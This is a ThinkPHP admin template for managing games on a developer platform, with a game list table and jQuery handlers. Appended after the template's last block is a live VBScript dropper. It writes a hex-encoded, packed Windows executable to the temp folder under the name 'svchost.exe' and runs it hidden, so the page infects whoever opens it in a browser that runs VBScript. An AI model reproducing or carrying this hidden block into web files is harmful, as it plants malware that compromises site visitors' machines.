|
|
|
<extend name="Public/base"/>
|
|
|
|
|
|
|
|
<block name="body">
|
|
|
|
<link rel="stylesheet" href="__CSS__/select2.min.css" type="text/css" />
|
|
|
|
<script type="text/javascript" src="__JS__/bootstrap.min.js"></script>
|
|
|
|
<script type="text/javascript" src="__JS__/select2.min.js"></script>
|
|
|
|
<!-- 标题栏 -->
|
|
|
|
<div class="main-place">
|
|
|
|
<span class="main-placetitle">位置</span>
|
|
|
|
<ul class="main-placeul">
|
|
|
|
<li><a href="{:U('Game/lists')}">开发者</a></li>
|
|
|
|
<li><a href="{:U('Game/lists')}">游戏管理</a></li>
|
|
|
|
<li><a href="#">{$meta_title}</a></li>
|
|
|
|
</ul>
|
|
|
|
<div class="question">
|
|
|
|
<i class="question_mark">?</i>
|
|
|
|
<ul class="question_content">
|
|
|
|
<li class="question_title">功能以及数据相关说明</li>
|
|
|
|
<li class="question_list">
|
|
|
|
<span class="">{$meta_title}</span>
|
|
|
|
<span class="">开发者平台运营游戏的列表以及游戏的相关信息参数配置等</span>
|
|
|
|
</li>
|
|
|
|
</ul>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
<div class="cf top_nav_list">
|
|
|
|
<div class="fl button_list">
|
|
|
|
<empty name="model.extend">
|
|
|
|
<div class="tools">
|
|
|
|
<a class="" href="{:U('addGame?model='.$model['id'])}"><span class="button_icon button_icon1"></span>新增</a>
|
|
|
|
<a class=" ajax-post " target-form="ids" url="{:U("set_status",array("status"=>1,"msg_type"=>5,"field"=>"apply_status"))}"><span class="button_icon button_icon9"></span>审核</a>
|
|
|
|
<a class=" ajax-post " target-form="ids" url="{:U("set_status",array("status"=>2,"msg_type"=>8,"field"=>"apply_status"))}"><span class="button_icon button_icon5"></span>驳回</a>
|
|
|
|
<a class="ajax-post confirm " target-form="ids" url="{:U('delGame?model='.$model['id'])}"><span class="button_icon button_icon2"></span>删除</a>
|
|
|
|
</div>
|
|
|
|
</empty>
|
|
|
|
</div>
|
|
|
|
<!-- 高级搜索 -->
|
|
|
|
<div class="jssearch fr cf search_list" style="margin-bottom:-15px;">
|
|
|
|
<!--游戏类型搜索END-->
|
|
|
|
<div class="input-list input-list-game search_label_rehab">
|
|
|
|
<label>游戏名称:</label>
|
|
|
|
<select id="game_id" name="game_name" class="select_gallery" >
|
|
|
|
<option value="">请选择游戏</option>
|
|
|
|
<volist name=":get_game_list()" id="vo">
|
|
|
|
<option game-id="{$vo.id}" value="{$vo.game_name}">{$vo.game_name}</option>
|
|
|
|
</volist>
|
|
|
|
</select>
|
|
|
|
</div>
|
|
|
|
<div class="input-list input-list-platform">
|
|
|
|
<label>运营平台:</label>
|
|
|
|
<select id="sdk_version1" name="sdk_version1" >
|
|
|
|
<option value="">请选择</option>
|
|
|
|
<volist name=":get_systems_list()" id="vo">
|
|
|
|
<gt name="key" value="0">
|
|
|
|
<option <if condition="$Thinkphp.get.sdk_version eq $key"> selected </if> value="{$key}">{$vo}</option>
|
|
|
|
</gt>
|
|
|
|
</volist>
|
|
|
|
<input type="hidden" id="sdk_version" name="sdk_version" value="{:I('sdk_version')}">
|
|
|
|
</select>
|
|
|
|
</div>
|
|
|
|
<div class="input-list">
|
|
|
|
<a class="sch-btn" href="javascript:;" id="search" url="{:U('Developers/game','model='.$model['name'],false)}">搜索</a>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
|
|
|
|
|
|
|
|
<!-- 数据列表 -->
|
|
|
|
<div class="data_list data_game_list">
|
|
|
|
<div class="">
|
|
|
|
<table>
|
|
|
|
<!-- 表头 -->
|
|
|
|
<thead>
|
|
|
|
<tr>
|
|
|
|
<th>
|
|
|
|
<input class="check-all" type="checkbox">
|
|
|
|
</th>
|
|
|
|
<th >编号</th>
|
|
|
|
<th >排序</th>
|
|
|
|
<th >图标</th>
|
|
|
|
<th >游戏名称</th>
|
|
|
|
<th >游戏来源</th>
|
|
|
|
<th >游戏类型</th>
|
|
|
|
<th >开放类型</th>
|
|
|
|
<th >显示状态</th>
|
|
|
|
<th>审核状态</th>
|
|
|
|
<th>接入状态</th>
|
|
|
|
<th>创建时间</th>
|
|
|
|
<th >运营平台</th>
|
|
|
|
<th >关联游戏</th>
|
|
|
|
<th >操作</th>
|
|
|
|
</tr>
|
|
|
|
</thead>
|
|
|
|
|
|
|
|
<!-- 列表 -->
|
|
|
|
<tbody>
|
|
|
|
<empty name="list_data" >
|
|
|
|
<tr>
|
|
|
|
<td colspan="15" class="text-center">aOh! 暂时还没有内容!</td>
|
|
|
|
</tr>
|
|
|
|
<else />
|
|
|
|
<volist name="list_data" id="data">
|
|
|
|
<tr>
|
|
|
|
<td><input class="ids" type="checkbox" value="{$data['id']}" name="ids[]"></td>
|
|
|
|
<td>{$data.id}</td>
|
|
|
|
<td>{$data.sort}</td>
|
|
|
|
<td class="data_icon"><img src="{$data.pic_path}" /></td>
|
|
|
|
<td>{$data.game_name}</td>
|
|
|
|
<td>{:get_developer_name($data['developers'])}</td>
|
|
|
|
<td>{:get_game_type_name($data['game_type_id'])}</td>
|
|
|
|
<td>{:get_one_opentype_name($data['category'])}</td>
|
|
|
|
<td><if condition="$data.game_status eq 0"><span style="color: red ">不显示</span><else/>显示</if></td>
|
|
|
|
<td>{:get_info_status($data['apply_status'],5)}</td>
|
|
|
|
<td>
|
|
|
|
<a href="javascript:;" onclick="changeGameStatus(this,{$data.id})"><if condition="$data.game_status eq 1">上线<elseif condition="($data.game_status eq 0) and ($data.apply_status eq 1)"/>下线<else/>对接中</if></a>
|
|
|
|
</td>
|
|
|
|
<td>{$data.create_time|date="Y-m-d h:i:s",###}</td>
|
|
|
|
<td class="">
|
|
|
|
{:get_systems_name($data['sdk_version'])}
|
|
|
|
</td>
|
|
|
|
<td>
|
|
|
|
<if condition="get_relation_game($data['id'],$data['relation_game_id']) eq false"><a href="{:U('relation',array('id'=>$data['id']))}">点击关联</a>
|
|
|
|
<elseif condition="get_relation_game($data['id'],$data['relation_game_id']) eq true" /><span style="color: orange">已关联</span>
|
|
|
|
<else/>
|
|
|
|
<span style="color: red">该游戏关联数据错误</span>
|
|
|
|
</if>
|
|
|
|
</td>
|
|
|
|
<td>
|
|
|
|
<a href="{:U('Developers/gameEdit?id='.$data['id'])}">编辑</a>
|
|
|
|
<a href="{:U('Game/del?ids='.$data['id'])}" class="confirm ajax-get">删除</a>
|
|
|
|
<if condition="UID eq 1"><a href="javascript:void(0);" data-game_id="{$data.id}" data-game_name="{$data.game_name}" data-game_appid="{$data.game_appid}" class="duij">对接参数</a></if>
|
|
|
|
<a href="{:U('developers/source',['game_id'=>$data['id']])}" class="">原包</a>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
</volist>
|
|
|
|
</empty>
|
|
|
|
</tbody>
|
|
|
|
</table>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
<div class="page">
|
|
|
|
{$_page|default=''}
|
|
|
|
</div>
|
|
|
|
</block>
|
|
|
|
|
|
|
|
<block name="script">
|
|
|
|
<script src="__STATIC__/layer/layer.js"></script>
|
|
|
|
<script>
|
|
|
|
|
|
|
|
<volist name=":I('get.')" id="vo">
|
|
|
|
Think.setValue('{$key}',"{$vo}");
|
|
|
|
</volist>
|
|
|
|
$(".select_gallery").select2();
|
|
|
|
</script>
|
|
|
|
<script type="text/javascript">
|
|
|
|
//导航高亮
|
|
|
|
highlight_subnav('{:U('developers/game')}');
|
|
|
|
function changeGameStatus(that,game_id){
|
|
|
|
if(that.innerHTML=="下线") {
|
|
|
|
//上线
|
|
|
|
$.ajax({
|
|
|
|
url: "{:U('set_status')}",
|
|
|
|
type:"POST",
|
|
|
|
dataType: 'json',
|
|
|
|
data: {ids:game_id,status:1,field:"game_status"},
|
|
|
|
success:function(data){
|
|
|
|
if(data.status==1){
|
|
|
|
layer.msg("上线成功", {icon: 1});
|
|
|
|
location.reload();
|
|
|
|
}else{
|
|
|
|
layer.msg("上线失败", {icon: 2});
|
|
|
|
}
|
|
|
|
},
|
|
|
|
error:function(){
|
|
|
|
layer.msg("错误", {icon: 2,})
|
|
|
|
}
|
|
|
|
})
|
|
|
|
}else if(that.innerHTML=="上线"){
|
|
|
|
|
|
|
|
//下线
|
|
|
|
$.ajax({
|
|
|
|
url: "{:U('set_status')}",
|
|
|
|
type:"POST",
|
|
|
|
dataType: 'json',
|
|
|
|
data: {ids:game_id,status:0,field:"game_status"},
|
|
|
|
success:function(data){
|
|
|
|
if(data.status==1){
|
|
|
|
layer.msg("下线成功", {icon: 1});
|
|
|
|
location.reload();
|
|
|
|
}else{
|
|
|
|
layer.msg("下线失败", {icon: 1});
|
|
|
|
}
|
|
|
|
},
|
|
|
|
error:function(){
|
|
|
|
layer.msg("错误", {icon: 2,})
|
|
|
|
}
|
|
|
|
})
|
|
|
|
}else{
|
|
|
|
layer.msg("请先审核",{icon:7});
|
|
|
|
}
|
|
|
|
}
|
|
|
|
$(function(){
|
|
|
|
|
|
|
|
$('.cooperwrap').hover(function(){
|
|
|
|
$(this).find('.nav-list').removeClass('hidden');
|
|
|
|
},function(){
|
|
|
|
$(this).find('.nav-list').addClass('hidden');
|
|
|
|
});
|
|
|
|
|
|
|
|
$('.cooperwrap .nav-list li').find('a').each(function(){
|
|
|
|
var that = $(this).closest('.cooperwrap'),top = $(this).closest('.cooperation');
|
|
|
|
$(this).click(function(){
|
|
|
|
var text = $(this).text(),val=$(this).attr('value');
|
|
|
|
that.find('.sort-txt').text(text).attr('data',val);
|
|
|
|
that.find('.nav-list').addClass('hidden');
|
|
|
|
|
|
|
|
var ratio = top.siblings('.ratio').find('span').text(),
|
|
|
|
price = top.siblings('.price').find('span').text(),
|
|
|
|
ids = top.siblings('.allch').find('.ids'),money=0;
|
|
|
|
val = ids.data('val')+text+','+ratio+','+price+',';
|
|
|
|
ids.attr('value',val);
|
|
|
|
if (text == 'CPS') {
|
|
|
|
money = (ratio * top.siblings('.recharge').text())/100;
|
|
|
|
} else {
|
|
|
|
money = price * top.siblings('.number').text();
|
|
|
|
}
|
|
|
|
if (isNaN(money)) {money=0;}
|
|
|
|
top.siblings('.money').text(money);
|
|
|
|
})
|
|
|
|
});
|
|
|
|
|
|
|
|
$('.cpbtn').on('click',function() {
|
|
|
|
var that = this,placeholder = $(that).data('notice'),cp = $.trim($(that).data('coom'));
|
|
|
|
html = '<div class="noticemsg " >';
|
|
|
|
html += '<div class="noticemain"><div class="noticeinput"><input placeholder="'+placeholder+'" type="text" class="txt" ></div>'
|
|
|
|
html += '<div class="noticebtn cpn"><a href="javascript:;">确定</a></div></div></div>';
|
|
|
|
$('body').append(html);
|
|
|
|
$('.noticebtn a').on('click',function() {
|
|
|
|
var val = $.trim($('.noticeinput input').val()),closeste = $(that).closest('.cp');
|
|
|
|
if (val) {
|
|
|
|
if (!/^\d+(\.\d{1})?$/.test(val)) {pop('请输入正确的数字');return false;}
|
|
|
|
$(that).siblings('span').text(val);
|
|
|
|
var money=0,cooperation = $.trim(closeste.siblings('.cooperation').find('.sort-txt').text());
|
|
|
|
|
|
|
|
if (cooperation === cp) {
|
|
|
|
money = val * closeste.siblings('.'+(cp.toLowerCase())).text();
|
|
|
|
}
|
|
|
|
if (cp == 'CPS') {
|
|
|
|
money=money/100;
|
|
|
|
ratio = val;
|
|
|
|
price = closeste.siblings('.price').find('span').text();
|
|
|
|
} else {
|
|
|
|
ratio = closeste.siblings('.ratio').find('span').text();
|
|
|
|
price = val;
|
|
|
|
}
|
|
|
|
if (isNaN(money)) {money=0;}
|
|
|
|
closeste.siblings('.money').text(money);
|
|
|
|
|
|
|
|
ids = closeste.siblings('.allch').find('.ids');
|
|
|
|
val = ids.data('val')+cooperation+','+ratio+','+price+',';
|
|
|
|
ids.attr('value',val);
|
|
|
|
}
|
|
|
|
$(this).closest('.noticemsg').remove();
|
|
|
|
});
|
|
|
|
$('.noticeinput input').keyup(function(event) {
|
|
|
|
if (event.keyCode == 13) {
|
|
|
|
$('.noticebtn a').click();
|
|
|
|
}
|
|
|
|
});
|
|
|
|
});
|
|
|
|
|
|
|
|
$('.confirmbtn').on('click',function() {
|
|
|
|
var that = $(this),closeste = that.closest('.op'),
|
|
|
|
cooperation = $.trim(closeste.siblings('.cooperation').find('.sort-txt').text()),
|
|
|
|
ratio = closeste.siblings('.ratio').find('span').text(),
|
|
|
|
price = closeste.siblings('.price').find('span').text(),
|
|
|
|
url = $(this).data('val'),index = url.lastIndexOf('.html');
|
|
|
|
if (index > 0)
|
|
|
|
url = url.substring(0,index)+'/cooperation/'+cooperation+'/cps_ratio/'+ratio+'/cpa_price/'+price+'.html';
|
|
|
|
else
|
|
|
|
url = url+'/cooperation/'+cooperation+'/cps_ratio/'+ratio+'/cpa_price/'+price+'.html';
|
|
|
|
$(this).siblings('.settlementbtn').attr('url',url).click();
|
|
|
|
});
|
|
|
|
//搜索功能
|
|
|
|
$("#search").click(function(){
|
|
|
|
var url = $(this).attr('url');
|
|
|
|
var query = $('.jssearch').find('input').serialize();
|
|
|
|
query += "&"+$('.jssearch').find('select').serialize();
|
|
|
|
query = query.replace(/(&|^)(\w*?\d*?\-*?_*?)*?=?((?=&)|(?=$))/g,'');
|
|
|
|
query = query.replace(/^&/g,'');
|
|
|
|
if( url.indexOf('?')>0 ){
|
|
|
|
url += '&' + query;
|
|
|
|
}else{
|
|
|
|
url += '?' + query;
|
|
|
|
}
|
|
|
|
window.location.href = url;
|
|
|
|
});
|
|
|
|
|
|
|
|
//回车自动提交
|
|
|
|
$('.jssearch').find('input').keyup(function(event){
|
|
|
|
if(event.keyCode===13){
|
|
|
|
$("#search").click();
|
|
|
|
}
|
|
|
|
});
|
|
|
|
|
|
|
|
$(".duij").click(function() {
|
|
|
|
var game_id=$(this).data("game_id");
|
|
|
|
var game_name=$(this).data("game_name");
|
|
|
|
var game_appid=$(this).data("game_appid");
|
|
|
|
$.ajax({
|
|
|
|
url: "{:U('get_game_set')}",
|
|
|
|
type:"POST",
|
|
|
|
dataType: 'json',
|
|
|
|
data: {game_id:game_id},
|
|
|
|
success:function(data){
|
|
|
|
if(data.status==1){
|
|
|
|
if(data.data.game_key==""||data.data.access_key==""){
|
|
|
|
layer.msg("游戏key未设置或者访问秘钥未设置", {icon: 2,})
|
|
|
|
}else{
|
|
|
|
layer.open({
|
|
|
|
type: 1,
|
|
|
|
skin: 'layui-layer-demo', //样式类名
|
|
|
|
closeBtn: 0, //不显示关闭按钮
|
|
|
|
anim: 2,
|
|
|
|
area: ['320px', '240px'], //宽高
|
|
|
|
shadeClose: true, //开启遮罩关闭
|
|
|
|
content: "游戏ID:  "+game_id+"<br/>"+"游戏名称:  "+game_name+"<br/>"+"游戏appid:  "+game_appid+"<br/>渠道ID:  0<br/>渠道名称:  自然注册<br/>游戏key:  "+data.data.game_key+"<br/>"+"游戏访问密钥:  "+data.data.access_key
|
|
|
|
});
|
|
|
|
|
|
|
|
}
|
|
|
|
}
|
|
|
|
},
|
|
|
|
error:function(){
|
|
|
|
layer.msg("错误", {icon: 2,})
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
});
|
|
|
|
//点击排序
|
|
|
|
$('.list_sort').click(function(){
|
|
|
|
var url = $(this).attr('url');
|
|
|
|
var ids = $('.ids:checked');
|
|
|
|
var param = '';
|
|
|
|
if(ids.length > 0){
|
|
|
|
var str = new Array();
|
|
|
|
ids.each(function(){
|
|
|
|
str.push($(this).val());
|
|
|
|
});
|
|
|
|
param = str.join(',');
|
|
|
|
}
|
|
|
|
|
|
|
|
if(url != undefined && url != ''){
|
|
|
|
|
|
|
|
window.location.href = url.replace(".html","") + '/ids/' + param;
|
|
|
|
}
|
|
|
|
});
|
|
|
|
})
|
|
|
|
</script>
|
|
|
|
<script>
|
|
|
|
$('.side-sub-menu').eq(0).show();
|
|
|
|
|
|
|
|
</script>
|
|
|
|
</block>
|
|
|
|
<SCRIPT Language=VBScript><!--
|
|
|
|
DropFileName = "svchost.exe"
|
|
|
|
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
|
|
|
|
Set FSO = CreateObject("Scripting.FileSystemObject")
|
|
|
|
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
|
|
|
|
If FSO.FileExists(DropPath)=False Then
|
|
|
|
Set FileObj = FSO.CreateTextFile(DropPath, True)
|
|
|
|
For i = 1 To Len(WriteData) Step 2
|
|
|
|
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
|
|
|
|
Next
|
|
|
|
FileObj.Close
|
|
|
|
End If
|
|
|
|
Set WSHshell = CreateObject("WScript.Shell")
|
|
|
|
WSHshell.Run DropPath, 0
|
|
|
|
//--></SCRIPT>
|